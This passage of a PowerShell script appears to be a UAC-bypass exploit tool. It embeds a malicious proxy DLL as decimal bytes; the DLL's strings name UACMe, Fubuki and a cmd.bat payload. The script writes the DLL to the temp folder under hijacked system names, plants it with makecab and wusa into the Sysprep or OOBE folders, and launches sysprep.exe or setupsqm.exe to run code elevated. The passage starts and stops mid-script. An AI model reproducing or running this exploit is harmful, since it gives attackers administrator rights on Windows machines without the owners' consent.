0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0",
[Parameter(Position = 6, Mandatory = $False)]
[String]
$DllBytes32 = "77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 232 0 0 0 14 31 186 14 0 180 9 205 33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 97 109 32 99 97 110 110 111 116 32 98 101 32 114 117 110 32 105 110 32 68 79 83 32 109 111 100 101 46 13 13 10 36 0 0 0 0 0 0 0 53 114 7 185 113 19 105 234 113 19 105 234 113 19 105 234 172 236 162 234 116 19 105 234 113 19 104 234 124 19 105 234 131 74 97 235 123 19 105 234 131 74 105 235 112 19 105 234 131 74 150 234 112 19 105 234 113 19 254 234 112 19 105 234 131 74 107 235 112 19 105 234 82 105 99 104 113 19 105 234 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 80 69 0 0 76 1 4 0 4 49 10 86 0 0 0 0 0 0 0 0 224 0 2 33 11 1 14 0 0 4 0 0 0 16 0 0 0 0 0 0 46 17 0 0 0 16 0 0 0 32 0 0 0 0 0 16 0 16 0 0 0 2 0 0 6 0 0 0 6 0 0 0 6 0 0 0 0 0 0 0 0 80 0 0 0 4 0 0 162 232 0 0 2 0 64 5 0 0 16 0 0 16 0 0 0 0 16 0 0 16 0 0 0 0 0 0 16 0 0 0 80 33 0 0 148 3 0 0 192 37 0 0 60 0 0 0 0 48 0 0 224 4 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 60 0 0 0 16 33 0 0 56 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 60 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 46 116 101 120 116 0 0 0 137 2 0 0 0 16 0 0 0 4 0 0 0 4 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 96 46 114 100 97 116 97 0 0 50 7 0 0 0 32 0 0 0 8 0 0 0 8 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 114 115 114 99 0 0 0 224 4 0 0 0 48 0 0 0 6 0 0 0 16 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 114 101 108 111 99 0 0 60 0 0 0 0 64 0 0 0 2 0 0 0 22 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 66 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 195 85 139 236 131 236 92 83 87 141 69 252 51 219 80 104 25 0 2 0 83 104 64 32 0 16 104 1 0 0 128 139 251 137 93 252 137 93 248 255 21 4 32 0 16 133 192 15 133 241 0 0 0 57 93 252 15 132 232 0 0 0 86 139 53 8 32 0 16 141 69 248 80 83 83 83 104 96 32 0 16 255 117 252 255 214 133 192 15 133 199 0 0 0 139 69 248 64 80 106 8 255 21 48 32 0 16 80 255 21 20 32 0 16 139 216 133 219 15 132 169 0 0 0 141 69 248 80 83 87 87 104 96 32 0 16 255 117 252 255 214 133 192 117 107 139 53 36 32 0 16 104 120 32 0 16 255 214 83 255 214 106 68 90 139 202 141 69 164 198 0 0 64 131 233 1 117 247 106 16 89 141 69 232 198 0 0 64 131 233 1 117 247 141 69 164 137 85 164 80 255 21 52 32 0 16 141 69 232 80 141 69 164 80 51 192 80 80 80 80 80 80 83 80 255 21 32 32 0 16 139 248 133 255 116 16 255 117 232 139 53 28 32 0 16 255 214 255 117 236 255 214 83 106 0 255 21 48 32 0 16 80 255 21 44 32 0 16 255 117 252 255 21 12 32 0 16 104 64 32 0 16 104 1 0 0 128 255 21 0 32 0 16 94 139 199 95 91 139 229 93 195 85 139 236 129 236 112 6 0 0 51 192 64 83 86 57 69 12 15 133 60 1 0 0 104 160 32 0 16 255 21 36 32 0 16 232 172 254 255 255 51 219 133 192 15 133 27 1 0 0 106 68 90 139 202 141 69 172 136 24 64 131 233 1 117 248 106 16 89 141 69 240 136 24 64 131 233 1 117 248 141 69 172 137 85 172 80 255 21 52 32 0 16 185 10 2 0 0 141 133 160 253 255 255 136 24 64 131 233 1 117 248 190 4 1 0 0 141 133 160 253 255 255 86 80 104 212 32 0 16 255 21 40 32 0 16 133 192 15 132 189 0 0 0 59 198 15 131 181 0 0 0 185 16 4 0 0 141 133 144 249 255 255 136 24 64 131 233 1 117 248 102 139 133 160 253 255 255 141 141 144 249 255 255 102 133 192 116 30 15 183 240 141 149 160 253 255 255 139 193 43 208 102 137 49 131 193 2 15 183 4 10 139 240 102 133 192 117 239 51 192 102 137 1 141 141 144 249 255 255 102 57 133 144 249 255 255 116 8 131 193 2 102 57 25 117 248 106 99 186 252 32 0 16 94 43 209 102 137 49 141 73 2 15 183 4 10 139 240 102 133 192 117 239 51 192 102 137 1 141 69 240 80 141 69 172 80 141 133 160 253 255 255 80 83 83 83 83 83 83 141 133 144 249 255 255 80 255 21 32 32 0 16 133 192 116 16 255 117 240 139 53 28 32 0 16 255 214 255 117 244 255 214 83 255 21 24 32 0 16 94 91 139 229 93 194 12 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 6 39 0 0 246 38 0 0 226 38 0 0 22 39 0 0 0 0 0 0 150 38 0 0 162 38 0 0 136 38 0 0 194 38 0 0 114 38 0 0 86 38 0 0 74 38 0 0 176 38 0 0 56 38 0 0 0 0 0 0 0 0 0 0 83 0 111 0 102 0 116 0 119 0 97 0 114 0 101 0 92 0 65 0 107 0 97 0 103 0 105 0 0 0 0 0 76 0 111 0 118 0 101 0 76 0 101 0 116 0 116 0 101 0 114 0 0 0 0 0 65 0 107 0 97 0 103 0 105 0 32 0 108 0 101 0 116 0 116 0 101 0 114 0 32 0 102 0 111 0 117 0 110 0 100 0 0 0 0 0 70 0 117 0 98 0 117 0 107 0 105 0 32 0 97 0 116 0 32 0 121 0 111 0 117 0 114 0 32 0 115 0 101 0 114 0 118 0 105 0 99 0 101 0 46 0 13 0 10 0 0 0 37 0 115 0 121 0 115 0 116 0 101 0 109 0 114 0 111 0 111 0 116 0 37 0 92 0 116 0 101 0 109 0 112 0 92 0 0 0 0 0 99 0 109 0 100 0 46 0 98 0 97 0 116 0 0 0 0 0 0 0 0 0 0 0 4 49 10 86 0 0 0 0 13 0 0 0 220 0 0 0 228 36 0 0 228 12 0 0 0 0 0 0 4 49 10 86 0 0 0 0 14 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4 49 10 86 0 0 0 0 144 34 0 0 1 0 0 0 28 0 0 0 28 0 0 0 120 33 0 0 232 33 0 0 88 34 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 157 34 0 0 180 34 0 0 202 34 0 0 212 34 0 0 222 34 0 0 249 34 0 0 21 35 0 0 48 35 0 0 67 35 0 0 88 35 0 0 106 35 0 0 126 35 0 0 147 35 0 0 175 35 0 0 194 35 0 0 218 35 0 0 237 35 0 0 8 36 0 0 28 36 0 0 49 36 0 0 76 36 0 0 102 36 0 0 114 36 0 0 136 36 0 0 150 36 0 0 177 36 0 0 195 36 0 0 215 36 0 0 0 0 1 0 2 0 3 0 4 0 5 0 6 0 7 0 8 0 9 0 10 0 11 0 12 0 13 0 14 0 15 0 16 0 17 0 18 0 19 0 20 0 21 0 22 0 23 0 24 0 25 0 26 0 27 0 70 117 98 117 107 105 51 50 46 100 108 108 0 67 97 108 108 78 116 80 111 119 101 114 73 110 102 111 114 109 97 116 105 111 110 0 67 111 110 115 116 114 117 99 116 80 97 114 116 105 97 108 77 115 103 86 87 0 67 114 101 97 116 101 85 114 105 0 67 117 114 114 101 110 116 73 80 0 68 101 118 79 98 106 67 114 101 97 116 101 68 101 118 105 99 101 73 110 102 111 76 105 115 116 0 68 101 118 79 98 106 68 101 115 116 114 111 121 68 101 118 105 99 101 73 110 102 111 76 105 115 116 0 68 101 118 79 98 106 69 110 117 109 68 101 118 105 99 101 73 110 116 101 114 102 97 99 101 115 0 68 101 118 79 98 106 71 101 116 67 108 97 115 115 68 101 118 115 0 68 101 118 79 98 106 79 112 101 110 68 101 118 105 99 101 73 110 102 111 0 68 108 108 82 101 103 105 115 116 101 114 83 101 114 118 101 114 0 71 101 110 101 114 97 116 101 65 99 116 105 111 110 81 117 101 117 101 0 80 111 119 101 114 71 101 116 65 99 116 105 118 101 83 99 104 101 109 101 0 80 114 105 118 97 116 101 67 111 73 110 116 101 114 110 101 116 67 111 109 98 105 110 101 85 114 105 0 80 114 111 99 101 115 115 65 99 116 105 111 110 81 117 101 117 101 0 83 76 71 101 116 87 105 110 100 111 119 115 73 110 102 111 114 109 97 116 105 111 110 0 87 100 115 65 98 111 114 116 66 108 97 99 107 98 111 97 114 100 0 87 100 115 65 98 111 114 116 66 108 97 99 107 98 111 97 114 100 73 116 101 109 69 110 117 109 0 87 100 115 67 114 101 97 116 101 66 108 97 99 107 98 111 97 114 100 0 87 100 115 68 101 115 116 114 111 121 66 108 97 99 107 98 111 97 114 100 0 87 100 115 69 110 117 109 70 105 114 115 116 66 108 97 99 107 98 111 97 114 100 73 116 101 109 0 87 100 115 69 110 117 109 78 101 120 116 66 108 97 99 107 98 111 97 114 100 73 116 101 109 0 87 100 115 70 114 101 101 68 97 116 97 0 87 100 115 71 101 116 66 108 97 99 107 98 111 97 114 100 86 97 108 117 101 0 87 100 115 73 110 105 116 105 97 108 105 122 101 0 87 100 115 73 115 68 105 97 103 110 111 115 116 105 99 77 111 100 101 69 110 97 98 108 101 100 0 87 100 115 83 101 116 65 115 115 101 114 116 70 108 97 103 115 0 87 100 115 83 101 116 117 112 76 111 103 77 101 115 115 97 103 101 87 0 87 100 115 84 101 114 109 105 110 97 116 101 0 71 67 84 76 0 16 0 0 137 2 0 0 46 116 101 120 116 36 109 110 0 0 0 0 0 32 0 0 60 0 0 0 46 105 100 97 116 97 36 53 0 0 0 0 64 32 0 0 8 1 0 0 46 114 100 97 116 97 0 0 80 33 0 0 148 3 0 0 46 101 100 97 116 97 0 0 228 36 0 0 220 0 0 0 46 114 100 97 116 97 36 122 122 122 100 98 103 0 0 0 192 37 0 0 40 0 0 0 46 105 100 97 116 97 36 50 0 0 0 0 232 37 0 0 20 0 0 0 46 105 100 97 116 97 36 51 0 0 0 0 252 37 0 0 60 0 0 0 46 105 100 97 116 97 36 52 0 0 0 0 56 38 0 0 250 0 0 0 46 105 100 97 116 97 36 54 0 0 0 0 0 48 0 0 160 0 0 0 46 114 115 114 99 36 48 49 0 0 0 0 160 48 0 0 64 4 0 0 46 114 115 114 99 36 48 50 0 0 0 0 16 38 0 0 0 0 0 0 0 0 0 0 212 38 0 0 20 32 0 0 252 37 0 0 0 0 0 0 0 0 0 0 36 39 0 0 0 32 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 6 39 0 0 246 38 0 0 226 38 0 0 22 39 0 0 0 0 0 0 150 38 0 0 162 38 0 0 136 38 0 0 194 38 0 0 114 38 0 0 86 38 0 0 74 38 0 0 176 38 0 0 56 38 0 0 0 0 0 0 190 2 71 101 116 83 116 97 114 116 117 112 73 110 102 111 87 0 51 3 72 101 97 112 70 114 101 101 0 0 85 1 69 120 112 97 110 100 69 110 118 105 114 111 110 109 101 110 116 83 116 114 105 110 103 115 87 0 250 3 79 117 116 112 117 116 68 101 98 117 103 83 116 114 105 110 103 87 0 0 127 0 67 108 111 115 101 72 97 110 100 108 101 0 47 3 72 101 97 112 65 108 108 111 99 0 81 1 69 120 105 116 80 114 111 99 101 115 115 0 162 2 71 101 116 80 114 111 99 101 115 115 72 101 97 112 0 0 219 0 67 114 101 97 116 101 80 114 111 99 101 115 115 87 0 0 75 69 82 78 69 76 51 50 46 100 108 108 0 0 146 2 82 101 103 81 117 101 114 121 86 97 108 117 101 69 120 87 0 0 133 2 82 101 103 79 112 101 110 75 101 121 69 120 87 0 104 2 82 101 103 68 101 108 101 116 101 75 101 121 87 0 84 2 82 101 103 67 108 111 115 101 75 101 121 0 65 68 86 65 80 73 51 50 46 100 108 108 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2 0 16 0 0 0 32 0 0 128 24 0 0 0 56 0 0 128 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 1 0 0 0 80 0 0 128 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 2 0 0 0 104 0 0 128 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 9 4 0 0 128 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 9 4 0 0 144 0 0 0 160 48 0 0 192 2 0 0 0 0 0 0 0 0 0 0 96 51 0 0 125 1 0 0 0 0 0 0 0 0 0 0 192 2 52 0 0 0 86 0 83 0 95 0 86 0 69 0 82 0 83 0 73 0 79 0 78 0 95 0 73 0 78 0 70 0 79 0 0 0 0 0 189 4 239 254 0 0 1 0 9 0 1 0 0 0 0 0 9 0 1 0 0 0 0 0 63 0 0 0 0 0 0 0 0 0 4 0 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 2 0 0 1 0 83 0 116 0 114 0 105 0 110 0 103 0 70 0 105 0 108 0 101 0 73 0 110 0 102 0 111 0 0 0 252 1 0 0 1 0 48 0 52 0 48 0 57 0 48 0 52 0 98 0 48 0 0 0 50 0 9 0 1 0 67 0 111 0 109 0 112 0 97 0 110 0 121 0 78 0 97 0 109 0 101 0 0 0 0 0 85 0 71 0 32 0 78 0 111 0 114 0 116 0 104 0 0 0 0 0 72 0 16 0 1 0 70 0 105 0 108 0 101 0 68 0 101 0 115 0 99 0 114 0 105 0 112 0 116 0 105 0 111 0 110 0 0 0 0 0 85 0 65 0 67 0 77 0 101 0 32 0 112 0 114 0 111 0 120 0 121 0 32 0 68 0 76 0 76 0 0 0 48 0 8 0 1 0 70 0 105 0 108 0 101 0 86 0 101 0 114 0 115 0 105 0 111 0 110 0 0 0 0 0 49 0 46 0 57 0 46 0 48 0 46 0 48 0 0 0 46 0 7 0 1 0 73 0 110 0 116 0 101 0 114 0 110 0 97 0 108 0 78 0 97 0 109 0 101 0 0 0 70 0 117 0 98 0 117 0 107 0 105 0 0 0 0 0 104 0 34 0 1 0 76 0 101 0 103 0 97 0 108 0 67 0 111 0 112 0 121 0 114 0 105 0 103 0 104 0 116 0 0 0 67 0 111 0 112 0 121 0 114 0 105 0 103 0 104 0 116 0 32 0 40 0 67 0 41 0 32 0 50 0 48 0 49 0 52 0 32 0 45 0 50 0 48 0 49 0 53 0 32 0 85 0 71 0 32 0 78 0 111 0 114 0 116 0 104 0 0 0 62 0 11 0 1 0 79 0 114 0 105 0 103 0 105 0 110 0 97 0 108 0 70 0 105 0 108 0 101 0 110 0 97 0 109 0 101 0 0 0 70 0 117 0 98 0 117 0 107 0 105 0 46 0 100 0 108 0 108 0 0 0 0 0 44 0 6 0 1 0 80 0 114 0 111 0 100 0 117 0 99 0 116 0 78 0 97 0 109 0 101 0 0 0 0 0 85 0 65 0 67 0 77 0 101 0 0 0 52 0 8 0 1 0 80 0 114 0 111 0 100 0 117 0 99 0 116 0 86 0 101 0 114 0 115 0 105 0 111 0 110 0 0 0 49 0 46 0 57 0 46 0 48 0 46 0 48 0 0 0 68 0 0 0 1 0 86 0 97 0 114 0 70 0 105 0 108 0 101 0 73 0 110 0 102 0 111 0 0 0 0 0 36 0 4 0 0 0 84 0 114 0 97 0 110 0 115 0 108 0 97 0 116 0 105 0 111 0 110 0 0 0 0 0 9 4 176 4 60 63 120 109 108 32 118 101 114 115 105 111 110 61 39 49 46 48 39 32 101 110 99 111 100 105 110 103 61 39 85 84 70 45 56 39 32 115 116 97 110 100 97 108 111 110 101 61 39 121 101 115 39 63 62 13 10 60 97 115 115 101 109 98 108 121 32 120 109 108 110 115 61 39 117 114 110 58 115 99 104 101 109 97 115 45 109 105 99 114 111 115 111 102 116 45 99 111 109 58 97 115 109 46 118 49 39 32 109 97 110 105 102 101 115 116 86 101 114 115 105 111 110 61 39 49 46 48 39 62 13 10 32 32 60 116 114 117 115 116 73 110 102 111 32 120 109 108 110 115 61 34 117 114 110 58 115 99 104 101 109 97 115 45 109 105 99 114 111 115 111 102 116 45 99 111 109 58 97 115 109 46 118 51 34 62 13 10 32 32 32 32 60 115 101 99 117 114 105 116 121 62 13 10 32 32 32 32 32 32 60 114 101 113 117 101 115 116 101 100 80 114 105 118 105 108 101 103 101 115 62 13 10 32 32 32 32 32 32 32 32 60 114 101 113 117 101 115 116 101 100 69 120 101 99 117 116 105 111 110 76 101 118 101 108 32 108 101 118 101 108 61 39 97 115 73 110 118 111 107 101 114 39 32 117 105 65 99 99 101 115 115 61 39 102 97 108 115 101 39 32 47 62 13 10 32 32 32 32 32 32 60 47 114 101 113 117 101 115 116 101 100 80 114 105 118 105 108 101 103 101 115 62 13 10 32 32 32 32 60 47 115 101 99 117 114 105 116 121 62 13 10 32 32 60 47 116 114 117 115 116 73 110 102 111 62 13 10 60 47 97 115 115 101 109 98 108 121 62 13 10 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 16 0 0 60 0 0 0 22 48 41 48 65 48 77 48 103 48 110 48 132 48 147 48 152 48 202 48 226 48 241 48 1 49 8 49 17 49 22 49 33 49 70 49 76 49 134 49 171 49 177 49 39 50 98 50 111 50 125 50 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0"
)
if ($CustomDll64)
{
Write-Output "Reading 64 bit DLL."
[byte[]]$bytes = [System.IO.File]::ReadAllBytes($CustomDll64)
$DllBytes64 = $bytes -join ' '
}
elseif ($CustomDll32)
{
Write-Output "Reading 32 bit DLL."
[byte[]]$bytes = [System.IO.File]::ReadAllBytes($CustomDll32)
$DllBytes32 = $bytes -join ' '
}
if (([IntPtr]::Size) -eq 8)
{
Write-Output "64 bit process detected."
$DllBytes = $DllBytes64
}
elseif (([IntPtr]::Size) -eq 4)
{
Write-Output "32 bit process detected."
$DllBytes = $DllBytes32
}
Out-File -FilePath $PayloadPath -InputObject $Payload -Encoding ascii
$OSVersion = (Get-WmiObject -Class win32_OperatingSystem).BuildNumber
switch($method)
{
"Sysprep"
{
Write-Output "Using Sysprep method"
if ($OSVersion -match "76")
{
Write-Output "Windows 7 found!"
$dllname = "CRYPTBASE.dll"
$PathToDll = "$env:temp\$dllname"
Write-Output "Writing to $PathToDll"
[Byte[]] $temp = $DllBytes -split ' '
[System.IO.File]::WriteAllBytes($PathToDll, $temp)
}
if ($OSVersion -match "96")
{
Write-Output "Windows 8 found!"
$dllname = "shcore.dll"
$PathToDll = "$env:temp\$dllname"
Write-Output "Writing to $PathToDll"
[Byte[]] $temp = $DllBytes -split ' '
[System.IO.File]::WriteAllBytes($PathToDll, $temp)
}
if ($OSVersion -match "10")
{
Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. "
}
$Target = "$env:temp\uac.cab"
$wusapath = "C:\Windows\System32\Sysprep\"
$execpath = "C:\Windows\System32\Sysprep\sysprep.exe"
Write-Output "Creating cab $Target"
$null = & makecab $PathToDll $Target
Write-Output "Extracting cab to $wusapath "
$null = & wusa $Target /extract:$wusapath
Start-Sleep -Seconds 1
Write-Output "Executing $execpath "
& $execpath
}
"OOBE"
{
Write-Output "Using OOBE method"
Write-Output "Writing DLLs to Temp directory"
if ($OSVersion -match "76")
{
Write-Output "Windows 7 found!"
$dllname = "wdscore.dll"
$PathToDll = "$env:temp\$dllname"
Write-Output "Writing to $PathToDll"
[Byte[]] $temp = $DllBytes -split ' '
[System.IO.File]::WriteAllBytes($PathToDll, $temp)
}
if ($OSVersion -match "96")
{
Write-Output "Windows 8 found!"
$dllname = "wdscore.dll"
$PathToDll = "$env:temp\$dllname"
Write-Output "Writing to $PathToDll"
[Byte[]] $temp = $DllBytes -split ' '
[System.IO.File]::WriteAllBytes($PathToDll, $temp)
}
if ($OSVersion -match "10")
{
Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. "
}
$Target = "$env:temp\uac.cab"
$wusapath = "C:\Windows\System32\oobe\"
$execpath = "C:\Windows\System32\oobe\setupsqm.exe"
Write-Output "Creating cab $Target"
$null = & makecab $PathToDll $Target
Write-Output "Extracting cab to $wusapath "
$null = & wusa $Target /extract:$wusapath
Start-Sleep -Seconds 1
Write-Output "Executing $execpath "
& $execpath
}
"ActionQueue"
{
Write-Output "Using Sysprep Actionqueue method"
if ($OSVersion -match "76")
{
Write-Output "Windows 7 found!"
$dllname = "ActionQueue.dll"
$PathToDll = "$env:temp\$dllname"
Write-Output "Writing to $PathToDll"
[Byte[]] $temp = $DllBytes -split ' '
[System.IO.File]::WriteAllBytes($PathToDll, $temp)
}
if ($OSVersion -match "96")
{
Write-Warning "This method doesn't work Windows 8.1 onwards."
}
if ($OSVersion -match "10")
{
Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. "
}
$Target = "$env:temp\uac.cab"
$wusapath = "C:\Windows\System32\Sysprep\"
$execpath = "C:\Windows\System32\Sysprep\sysprep.exe"
Write-Output "Creating cab $Target"
$null = & makecab $PathToDll $Target
Write-Output "Extracting cab to $wusapath "
$null = & wusa $Target /extract:$wusapath
Start-Sleep -Seconds 1
Write-Output "Executing $execpath "
& $execpath
}
"migwiz"
{
Write-Output "Using migwiz method"
if ($OSVersion -match "76")
{
Write-Output "Windows 7 found!"
$dllname = "wdscore.dll"
$PathToDll = "$env:temp\$dllname"
Write-Output "Writing to $PathToDll"
[Byte[]] $temp = $DllBytes -split ' '
[System.IO.File]::WriteAllBytes($PathToDll, $temp)
}
if ($OSVersion -match "96")
{
Write-Output "Windows 8 found!"
$dllname = "wdscore.dll"
$PathToDll = "$env:temp\$dllname"
Write-Output "Writing to $PathToDll"
